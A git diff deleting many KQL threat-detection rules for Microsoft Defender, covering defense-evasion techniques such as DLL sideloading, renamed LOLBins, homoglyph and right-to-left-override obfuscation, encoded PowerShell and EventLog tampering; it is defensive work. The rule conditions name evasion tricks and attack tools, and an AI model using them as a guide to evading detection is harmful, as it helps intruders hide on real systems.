-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/10/26
-// Level: medium
-// Description: Detects potential evasion or obfuscation attempts using bogus path traversal via the commandline
-// Tags: attack.defense_evasion, attack.t1036
-DeviceProcessEvents
-| where (((ProcessCommandLine contains "\\..\\Windows\\" or ProcessCommandLine contains "\\..\\System32\\" or ProcessCommandLine contains "\\..\\..\\") and FolderPath contains "\\Windows\\") or ProcessCommandLine contains ".exe\\..\\") and (not((ProcessCommandLine contains "\\Citrix\\Virtual Smart Card\\Citrix.Authentication.VirtualSmartcard.Launcher.exe\\..\\" or ProcessCommandLine contains "\\Google\\Drive\\googledrivesync.exe\\..\\")))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Commandline_Obfuscation_Using_Escape_Characters.kql b/Defense Evasion/Potential_Commandline_Obfuscation_Using_Escape_Characters.kql
deleted file mode 100644
index cffa5dcf..00000000
--- a/Defense Evasion/Potential_Commandline_Obfuscation_Using_Escape_Characters.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: juju4
-// Date: 2018/12/11
-// Level: medium
-// Description: Detects potential commandline obfuscation using known escape characters
-// Tags: attack.defense_evasion, attack.t1140
-DeviceProcessEvents
-| where ProcessCommandLine contains "h^t^t^p" or ProcessCommandLine contains "h\"t\"t\"p"
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Commandline_Obfuscation_Using_Unicode_Characters.kql b/Defense Evasion/Potential_Commandline_Obfuscation_Using_Unicode_Characters.kql
deleted file mode 100644
index 2dc00551..00000000
--- a/Defense Evasion/Potential_Commandline_Obfuscation_Using_Unicode_Characters.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113, Florian Roth (Nextron Systems)
-// Date: 2022/01/15
-// Level: high
-// Description: Detects potential commandline obfuscation using unicode characters.
-Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.
-
-// Tags: attack.defense_evasion, attack.t1027
-DeviceProcessEvents
-| where (ProcessCommandLine contains "â" or ProcessCommandLine contains "€" or ProcessCommandLine contains "£" or ProcessCommandLine contains "¯" or ProcessCommandLine contains "®" or ProcessCommandLine contains "µ" or ProcessCommandLine contains "¶") or (ProcessCommandLine contains "ˣ" or ProcessCommandLine contains "˪" or ProcessCommandLine contains "ˢ") or (ProcessCommandLine contains "―" or ProcessCommandLine contains "—") or (ProcessCommandLine contains "∕" or ProcessCommandLine contains "⁄")
\ No newline at end of file
diff --git a/Defense Evasion/Potential_DLL_Injection_Or_Execution_Using_Tracker.exe.kql b/Defense Evasion/Potential_DLL_Injection_Or_Execution_Using_Tracker.exe.kql
deleted file mode 100644
index 598a6653..00000000
--- a/Defense Evasion/Potential_DLL_Injection_Or_Execution_Using_Tracker.exe.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Avneet Singh @v3t0_, oscd.community
-// Date: 2020/10/18
-// Level: medium
-// Description: Detects potential DLL injection and execution using "Tracker.exe"
-// Tags: attack.defense_evasion, attack.t1055.001
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " /d " or ProcessCommandLine contains " /c ") and (FolderPath endswith "\\tracker.exe" or ProcessVersionInfoFileDescription =~ "Tracker")) and (not((ProcessCommandLine contains " /ERRORREPORT:PROMPT " or (InitiatingProcessFolderPath endswith "\\Msbuild\\Current\\Bin\\MSBuild.exe" or InitiatingProcessFolderPath endswith "\\Msbuild\\Current\\Bin\\amd64\\MSBuild.exe"))))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_DLL_Sideloading_Of_DBGCORE.DLL.kql b/Defense Evasion/Potential_DLL_Sideloading_Of_DBGCORE.DLL.kql
deleted file mode 100644
index 7d53df8f..00000000
--- a/Defense Evasion/Potential_DLL_Sideloading_Of_DBGCORE.DLL.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
-// Date: 2022/10/25
-// Level: medium
-// Description: Detects DLL sideloading of "dbgcore.dll"
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\dbgcore.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\" or FolderPath startswith "C:\\Program Files\\" or FolderPath startswith "C:\\Windows\\SoftwareDistribution\\" or FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SystemTemp\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))) and (not(FolderPath endswith "\\Steam\\bin\\cef\\cef.win7x64\\dbgcore.dll"))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_DLL_Sideloading_Of_DBGHELP.DLL.kql b/Defense Evasion/Potential_DLL_Sideloading_Of_DBGHELP.DLL.kql
deleted file mode 100644
index 85e52e34..00000000
--- a/Defense Evasion/Potential_DLL_Sideloading_Of_DBGHELP.DLL.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
-// Date: 2022/10/25
-// Level: medium
-// Description: Detects DLL sideloading of "dbghelp.dll"
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\dbghelp.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\" or FolderPath startswith "C:\\Program Files\\" or FolderPath startswith "C:\\Windows\\SoftwareDistribution\\" or FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SystemTemp\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))) and (not(((FolderPath endswith "\\Anaconda3\\Lib\\site-packages\\vtrace\\platforms\\windll\\amd64\\dbghelp.dll" or FolderPath endswith "\\Anaconda3\\Lib\\site-packages\\vtrace\\platforms\\windll\\i386\\dbghelp.dll") or (FolderPath endswith "\\Epic Games\\Launcher\\Engine\\Binaries\\ThirdParty\\DbgHelp\\dbghelp.dll" or FolderPath endswith "\\Epic Games\\MagicLegends\\x86\\dbghelp.dll"))))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_DLL_Sideloading_Of_Libcurl.DLL_Via_GUP.EXE.kql b/Defense Evasion/Potential_DLL_Sideloading_Of_Libcurl.DLL_Via_GUP.EXE.kql
deleted file mode 100644
index bafb67b9..00000000
--- a/Defense Evasion/Potential_DLL_Sideloading_Of_Libcurl.DLL_Via_GUP.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/05
-// Level: medium
-// Description: Detects potential DLL sideloading of "libcurl.dll" by the "gup.exe" process from an uncommon location
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\libcurl.dll" and InitiatingProcessFolderPath endswith "\\gup.exe") and (not(InitiatingProcessFolderPath endswith "\\Notepad++\\updater\\GUP.exe"))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_DLL_Sideloading_Using_Coregen.exe.kql b/Defense Evasion/Potential_DLL_Sideloading_Using_Coregen.exe.kql
deleted file mode 100644
index 4c46541b..00000000
--- a/Defense Evasion/Potential_DLL_Sideloading_Using_Coregen.exe.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/12/31
-// Level: medium
-// Description: Detect usage of DLL "coregen.exe" (Microsoft CoreCLR Native Image Generator) binary to sideload arbitrary DLLs.
-// Tags: attack.defense_evasion, attack.t1218, attack.t1055
-DeviceImageLoadEvents
-| where InitiatingProcessFolderPath endswith "\\coregen.exe" and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Program Files\\Microsoft Silverlight\\" or FolderPath startswith "C:\\Program Files (x86)\\Microsoft Silverlight\\")))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_DLL_Sideloading_Via_ClassicExplorer32.dll.kql b/Defense Evasion/Potential_DLL_Sideloading_Via_ClassicExplorer32.dll.kql
deleted file mode 100644
index d6f4a3c3..00000000
--- a/Defense Evasion/Potential_DLL_Sideloading_Via_ClassicExplorer32.dll.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/12/13
-// Level: medium
-// Description: Detects potential DLL sideloading using ClassicExplorer32.dll from the Classic Shell software
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\ClassicExplorer32.dll" and (not(FolderPath startswith "C:\\Program Files\\Classic Shell\\"))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_DLL_Sideloading_Via_DeviceEnroller.EXE.kql b/Defense Evasion/Potential_DLL_Sideloading_Via_DeviceEnroller.EXE.kql
deleted file mode 100644
index 7c55658c..00000000
--- a/Defense Evasion/Potential_DLL_Sideloading_Via_DeviceEnroller.EXE.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: @gott_cyber
-// Date: 2022/08/29
-// Level: medium
-// Description: Detects the use of the PhoneDeepLink parameter to potentially sideload a DLL file that does not exist. This non-existent DLL file is named "ShellChromeAPI.dll".
-Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter
-
-// Tags: attack.defense_evasion, attack.t1574.002
-DeviceProcessEvents
-| where ProcessCommandLine contains "/PhoneDeepLink" and (FolderPath endswith "\\deviceenroller.exe" or ProcessVersionInfoOriginalFileName =~ "deviceenroller.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Potential_DLL_Sideloading_Via_JsSchHlp.kql b/Defense Evasion/Potential_DLL_Sideloading_Via_JsSchHlp.kql
deleted file mode 100644
index 4d8a43ae..00000000
--- a/Defense Evasion/Potential_DLL_Sideloading_Via_JsSchHlp.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/12/14
-// Level: medium
-// Description: Detects potential DLL sideloading using JUSTSYSTEMS Japanese word processor
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\JSESPR.dll" and (not(FolderPath startswith "C:\\Program Files\\Common Files\\Justsystem\\JsSchHlp\\"))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_DLL_Sideloading_Via_VMware_Xfer.kql b/Defense Evasion/Potential_DLL_Sideloading_Via_VMware_Xfer.kql
deleted file mode 100644
index 418f4c38..00000000
--- a/Defense Evasion/Potential_DLL_Sideloading_Via_VMware_Xfer.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/02
-// Level: high
-// Description: Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to sideload arbitrary DLL
-// Tags: attack.defense_evasion, attack.t1574.002
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\glib-2.0.dll" and InitiatingProcessFolderPath endswith "\\VMwareXferlogs.exe") and (not(FolderPath startswith "C:\\Program Files\\VMware\\"))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_DLL_Sideloading_Via_comctl32.dll.kql b/Defense Evasion/Potential_DLL_Sideloading_Via_comctl32.dll.kql
deleted file mode 100644
index 05e33118..00000000
--- a/Defense Evasion/Potential_DLL_Sideloading_Via_comctl32.dll.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Subhash Popuri (@pbssubhash)
-// Date: 2022/12/16
-// Level: high
-// Description: Detects potential DLL sideloading using comctl32.dll to obtain system privileges
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\comctl32.dll" and (FolderPath startswith "C:\\Windows\\System32\\logonUI.exe.local\\" or FolderPath startswith "C:\\Windows\\System32\\werFault.exe.local\\" or FolderPath startswith "C:\\Windows\\System32\\consent.exe.local\\" or FolderPath startswith "C:\\Windows\\System32\\narrator.exe.local\\" or FolderPath startswith "C:\\windows\\system32\\wermgr.exe.local\\")
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Defense_Evasion_Via_Binary_Rename.kql b/Defense Evasion/Potential_Defense_Evasion_Via_Binary_Rename.kql
deleted file mode 100644
index e1088872..00000000
--- a/Defense Evasion/Potential_Defense_Evasion_Via_Binary_Rename.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Matthew Green @mgreen27, Ecco, James Pemberton @4A616D6573, oscd.community, Andreas Hunkeler (@Karneades)
-// Date: 2019/06/15
-// Level: medium
-// Description: Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.
-// Tags: attack.defense_evasion, attack.t1036.003
-DeviceProcessEvents
-| where (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "CONHOST.EXE", "7z.exe", "WinRAR.exe", "wevtutil.exe", "net.exe", "net1.exe", "netsh.exe", "InstallUtil.exe")) and (not((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\conhost.exe" or FolderPath endswith "\\7z.exe" or FolderPath endswith "\\WinRAR.exe" or FolderPath endswith "\\wevtutil.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\netsh.exe" or FolderPath endswith "\\InstallUtil.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Defense_Evasion_Via_Rename_Of_Highly_Relevant_Binaries.kql b/Defense Evasion/Potential_Defense_Evasion_Via_Rename_Of_Highly_Relevant_Binaries.kql
deleted file mode 100644
index 9b1bd1ff..00000000
--- a/Defense Evasion/Potential_Defense_Evasion_Via_Rename_Of_Highly_Relevant_Binaries.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Matthew Green - @mgreen27, Florian Roth (Nextron Systems), frack113
-// Date: 2019/06/15
-// Level: high
-// Description: Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.
-// Tags: attack.defense_evasion, attack.t1036.003, car.2013-05-009
-DeviceProcessEvents
-| where (ProcessVersionInfoFileDescription =~ "Execute processes remotely" or ProcessVersionInfoProductName =~ "Sysinternals PsExec" or (ProcessVersionInfoFileDescription startswith "Windows PowerShell" or ProcessVersionInfoFileDescription startswith "pwsh") or (ProcessVersionInfoOriginalFileName in~ ("certutil.exe", "cmstp.exe", "cscript.exe", "mshta.exe", "msiexec.exe", "powershell_ise.exe", "powershell.exe", "psexec.c", "psexec.exe", "psexesvc.exe", "pwsh.dll", "reg.exe", "regsvr32.exe", "rundll32.exe", "WerMgr", "wmic.exe", "wscript.exe"))) and (not((FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmstp.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\psexec.exe" or FolderPath endswith "\\psexec64.exe" or FolderPath endswith "\\PSEXESVC.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wermgr.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Defense_Evasion_Via_Right-to-Left_Override.kql b/Defense Evasion/Potential_Defense_Evasion_Via_Right-to-Left_Override.kql
deleted file mode 100644
index 1a7fb871..00000000
--- a/Defense Evasion/Potential_Defense_Evasion_Via_Right-to-Left_Override.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Micah Babinski, @micahbabinski
-// Date: 2023/02/15
-// Level: high
-// Description: Detects the presence of the "u202+E" character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence.
-This is used as an obfuscation and masquerading techniques.
-
-// Tags: attack.defense_evasion, attack.t1036.002
-DeviceProcessEvents
-| where ProcessCommandLine contains "‮"
\ No newline at end of file
diff --git a/Defense Evasion/Potential_EACore.DLL_Sideloading.kql b/Defense Evasion/Potential_EACore.DLL_Sideloading.kql
deleted file mode 100644
index f843422e..00000000
--- a/Defense Evasion/Potential_EACore.DLL_Sideloading.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/08/03
-// Level: high
-// Description: Detects potential DLL sideloading of "EACore.dll"
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\EACore.dll" and (not((FolderPath startswith "C:\\Program Files\\Electronic Arts\\EA Desktop\\" and (InitiatingProcessFolderPath contains "C:\\Program Files\\Electronic Arts\\EA Desktop\\" and InitiatingProcessFolderPath contains "\\EACoreServer.exe"))))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Edputil.DLL_Sideloading.kql b/Defense Evasion/Potential_Edputil.DLL_Sideloading.kql
deleted file mode 100644
index fa643858..00000000
--- a/Defense Evasion/Potential_Edputil.DLL_Sideloading.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/06/09
-// Level: high
-// Description: Detects potential DLL sideloading of "edputil.dll"
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\edputil.dll" and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C\\Windows\\WinSxS\\")))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Encoded_PowerShell_Patterns_In_CommandLine.kql b/Defense Evasion/Potential_Encoded_PowerShell_Patterns_In_CommandLine.kql
deleted file mode 100644
index a07c661e..00000000
--- a/Defense Evasion/Potential_Encoded_PowerShell_Patterns_In_CommandLine.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton
-// Date: 2020/10/11
-// Level: low
-// Description: Detects specific combinations of encoding methods in PowerShell via the commandline
-// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (((ProcessCommandLine contains "ToInt" or ProcessCommandLine contains "ToDecimal" or ProcessCommandLine contains "ToByte" or ProcessCommandLine contains "ToUint" or ProcessCommandLine contains "ToSingle" or ProcessCommandLine contains "ToSByte") and (ProcessCommandLine contains "ToChar" or ProcessCommandLine contains "ToString" or ProcessCommandLine contains "String")) or ((ProcessCommandLine contains "char" and ProcessCommandLine contains "join") or (ProcessCommandLine contains "split" and ProcessCommandLine contains "join")))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_EventLog_File_Location_Tampering.kql b/Defense Evasion/Potential_EventLog_File_Location_Tampering.kql
deleted file mode 100644
index f6bdd5e5..00000000
--- a/Defense Evasion/Potential_EventLog_File_Location_Tampering.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: D3F7A5105
-// Date: 2023/01/02
-// Level: high
-// Description: Detects tampering with EventLog service "file" key. In order to change the default location of an Evtx file. This technique is used to tamper with log collection and alerting
-// Tags: attack.defense_evasion, attack.t1562.002
-DeviceRegistryEvents
-| where (RegistryKey contains "\\SYSTEM\\CurrentControlSet\\Services\\EventLog" and RegistryKey endswith "\\File") and (not(RegistryValueData contains "\\System32\\Winevt\\Logs\\"))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Fake_Instance_Of_Hxtsr.EXE_Executed.kql b/Defense Evasion/Potential_Fake_Instance_Of_Hxtsr.EXE_Executed.kql
deleted file mode 100644
index 4f50439f..00000000
--- a/Defense Evasion/Potential_Fake_Instance_Of_Hxtsr.EXE_Executed.kql	
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Sreeman
-// Date: 2020/04/17
-// Level: medium
-// Description: HxTsr.exe is a Microsoft compressed executable file called Microsoft Outlook Communications.
-HxTsr.exe is part of Outlook apps, because it resides in a hidden "WindowsApps" subfolder of "C:\Program Files".
-Any instances of hxtsr.exe not in this folder may be malware camouflaging itself as HxTsr.exe
-
-// Tags: attack.defense_evasion, attack.t1036
-DeviceProcessEvents
-| where FolderPath endswith "\\hxtsr.exe" and (not((FolderPath contains ":\\program files\\windowsapps\\microsoft.windowscommunicationsapps_" and FolderPath endswith "\\hxtsr.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_File_Download_Via_MS-AppInstaller_Protocol_Handler.kql b/Defense Evasion/Potential_File_Download_Via_MS-AppInstaller_Protocol_Handler.kql
deleted file mode 100644
index 45a8fd0c..00000000
--- a/Defense Evasion/Potential_File_Download_Via_MS-AppInstaller_Protocol_Handler.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel
-// Date: 2023/11/09
-// Level: medium
-// Description: Detects usage of the "ms-appinstaller" protocol handler via command line to potentially download arbitrary files via AppInstaller.EXE
-The downloaded files are temporarly stored in ":\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\<RANDOM-8-CHAR-DIRECTORY>"
-
-// Tags: attack.defense_evasion, attack.execution, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains "ms-appinstaller://" and ProcessCommandLine contains "source=") and ProcessCommandLine contains "http"
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Goopdate.DLL_Sideloading.kql b/Defense Evasion/Potential_Goopdate.DLL_Sideloading.kql
deleted file mode 100644
index 27f1e8dc..00000000
--- a/Defense Evasion/Potential_Goopdate.DLL_Sideloading.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/15
-// Level: medium
-// Description: Detects potential DLL sideloading of "goopdate.dll", a DLL used by googleupdate.exe
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\goopdate.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\" or FolderPath startswith "C:\\Program Files\\"))) and (not(((FolderPath contains "\\AppData\\Local\\Temp\\GUM" and FolderPath contains ".tmp\\goopdate.dll") and (InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\GUM" and InitiatingProcessFolderPath contains ".tmp\\Dropbox"))))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Hidden_Directory_Creation_Via_NTFS_INDEX_ALLOCATION_Stream.kql b/Defense Evasion/Potential_Hidden_Directory_Creation_Via_NTFS_INDEX_ALLOCATION_Stream.kql
deleted file mode 100644
index fbde79fa..00000000
--- a/Defense Evasion/Potential_Hidden_Directory_Creation_Via_NTFS_INDEX_ALLOCATION_Stream.kql	
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Scoubi (@ScoubiMtl)
-// Date: 2023/10/09
-// Level: medium
-// Description: Detects the creation of hidden file/folder with the "::$index_allocation" stream. Which can be used as a technique to prevent access to folder and files from tooling such as "explorer.exe" and "powershell.exe"
-
-// Tags: attack.defense_evasion, attack.t1564.004
-DeviceFileEvents
-| where FolderPath contains "::$index_allocation"
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Hidden_Directory_Creation_Via_NTFS_INDEX_ALLOCATION_Stream_-_CLI.kql b/Defense Evasion/Potential_Hidden_Directory_Creation_Via_NTFS_INDEX_ALLOCATION_Stream_-_CLI.kql
deleted file mode 100644
index 879b3fc5..00000000
--- a/Defense Evasion/Potential_Hidden_Directory_Creation_Via_NTFS_INDEX_ALLOCATION_Stream_-_CLI.kql	
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Scoubi (@ScoubiMtl)
-// Date: 2023/10/09
-// Level: medium
-// Description: Detects command line containing reference to the "::$index_allocation" stream, which can be used as a technique to prevent access to folders or files from tooling such as "explorer.exe" or "powershell.exe"
-
-// Tags: attack.defense_evasion, attack.t1564.004
-DeviceProcessEvents
-| where ProcessCommandLine contains "::$index_allocation"
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Homoglyph_Attack_Using_Lookalike_Characters.kql b/Defense Evasion/Potential_Homoglyph_Attack_Using_Lookalike_Characters.kql
deleted file mode 100644
index 196cf067..00000000
--- a/Defense Evasion/Potential_Homoglyph_Attack_Using_Lookalike_Characters.kql	
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Micah Babinski, @micahbabinski
-// Date: 2023/05/07
-// Level: medium
-// Description: Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters.
-This is used as an obfuscation and masquerading techniques. Only "perfect" homoglyphs are included; these are characters that
-are indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters.
-
-// Tags: attack.defense_evasion, attack.t1036, attack.t1036.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains "а" or ProcessCommandLine contains "е" or ProcessCommandLine contains "о" or ProcessCommandLine contains "р" or ProcessCommandLine contains "с" or ProcessCommandLine contains "х" or ProcessCommandLine contains "ѕ" or ProcessCommandLine contains "і" or ProcessCommandLine contains "ӏ" or ProcessCommandLine contains "ј" or ProcessCommandLine contains "һ" or ProcessCommandLine contains "ԁ" or ProcessCommandLine contains "ԛ" or ProcessCommandLine contains "ԝ" or ProcessCommandLine contains "ο") or (ProcessCommandLine contains "А" or ProcessCommandLine contains "В" or ProcessCommandLine contains "Е" or ProcessCommandLine contains "К" or ProcessCommandLine contains "М" or ProcessCommandLine contains "Н" or ProcessCommandLine contains "О" or ProcessCommandLine contains "Р" or ProcessCommandLine contains "С" or ProcessCommandLine contains "Т" or ProcessCommandLine contains "Х" or ProcessCommandLine contains "Ѕ" or ProcessCommandLine contains "І" or ProcessCommandLine contains "Ј" or ProcessCommandLine contains "Ү" or ProcessCommandLine contains "Ӏ" or ProcessCommandLine contains "Ԍ" or ProcessCommandLine contains "Ԛ" or ProcessCommandLine contains "Ԝ" or ProcessCommandLine contains "Α" or ProcessCommandLine contains "Β" or ProcessCommandLine contains "Ε" or ProcessCommandLine contains "Ζ" or ProcessCommandLine contains "Η" or ProcessCommandLine contains "Ι" or ProcessCommandLine contains "Κ" or ProcessCommandLine contains "Μ" or ProcessCommandLine contains "Ν" or ProcessCommandLine contains "Ο" or ProcessCommandLine contains "Ρ" or ProcessCommandLine contains "Τ" or ProcessCommandLine contains "Υ" or ProcessCommandLine contains "Χ")
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Homoglyph_Attack_Using_Lookalike_Characters_in_Filename.kql b/Defense Evasion/Potential_Homoglyph_Attack_Using_Lookalike_Characters_in_Filename.kql
deleted file mode 100644
index 41664742..00000000
--- a/Defense Evasion/Potential_Homoglyph_Attack_Using_Lookalike_Characters_in_Filename.kql	
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Micah Babinski, @micahbabinski
-// Date: 2023/05/08
-// Level: medium
-// Description: Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters.
-This is used as an obfuscation and masquerading techniques. Only "perfect" homoglyphs are included; these are characters that
-are indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters.
-
-// Tags: attack.defense_evasion, attack.t1036, attack.t1036.003
-DeviceFileEvents
-| where (FolderPath contains "а" or FolderPath contains "е" or FolderPath contains "о" or FolderPath contains "р" or FolderPath contains "с" or FolderPath contains "х" or FolderPath contains "ѕ" or FolderPath contains "і" or FolderPath contains "ӏ" or FolderPath contains "ј" or FolderPath contains "һ" or FolderPath contains "ԁ" or FolderPath contains "ԛ" or FolderPath contains "ԝ" or FolderPath contains "ο") or (FolderPath contains "А" or FolderPath contains "В" or FolderPath contains "Е" or FolderPath contains "К" or FolderPath contains "М" or FolderPath contains "Н" or FolderPath contains "О" or FolderPath contains "Р" or FolderPath contains "С" or FolderPath contains "Т" or FolderPath contains "Х" or FolderPath contains "Ѕ" or FolderPath contains "І" or FolderPath contains "Ј" or FolderPath contains "Ү" or FolderPath contains "Ӏ" or FolderPath contains "Ԍ" or FolderPath contains "Ԛ" or FolderPath contains "Ԝ" or FolderPath contains "Α" or FolderPath contains "Β" or FolderPath contains "Ε" or FolderPath contains "Ζ" or FolderPath contains "Η" or FolderPath contains "Ι" or FolderPath contains "Κ" or FolderPath contains "Μ" or FolderPath contains "Ν" or FolderPath contains "Ο" or FolderPath contains "Ρ" or FolderPath contains "Τ" or FolderPath contains "Υ" or FolderPath contains "Χ")
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Initial_Access_via_DLL_Search_Order_Hijacking.kql b/Defense Evasion/Potential_Initial_Access_via_DLL_Search_Order_Hijacking.kql
deleted file mode 100644
index 3c74a001..00000000
--- a/Defense Evasion/Potential_Initial_Access_via_DLL_Search_Order_Hijacking.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tim Rauch (rule), Elastic (idea)
-// Date: 2022/10/21
-// Level: medium
-// Description: Detects attempts to create a DLL file to a known desktop application dependencies folder such as Slack, Teams or OneDrive and by an unusual process. This may indicate an attempt to load a malicious module via DLL search order hijacking.
